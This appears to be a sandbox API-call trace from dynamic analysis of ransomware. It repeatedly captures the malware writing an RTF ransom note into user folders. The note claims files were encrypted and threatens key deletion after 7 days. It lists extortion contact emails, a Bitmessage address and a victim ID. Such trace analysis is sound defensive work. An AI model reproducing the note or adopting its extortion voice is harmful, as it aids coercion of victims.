\\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x9cí\x89ì'CÓì\x11÷gv\x13\x07", lpUsedDefaultChar=0x0) returned 8717 [0298.831] WriteFile (in: hFile=0x27c, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.832] CloseHandle (hObject=0x27c) returned 1 [0298.832] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\#readme_eman#.rtf")) returned 0xffffffff [0298.832] GetLastError () returned 0x2 [0298.832] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\ku-arab\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\ku-arab\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.833] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 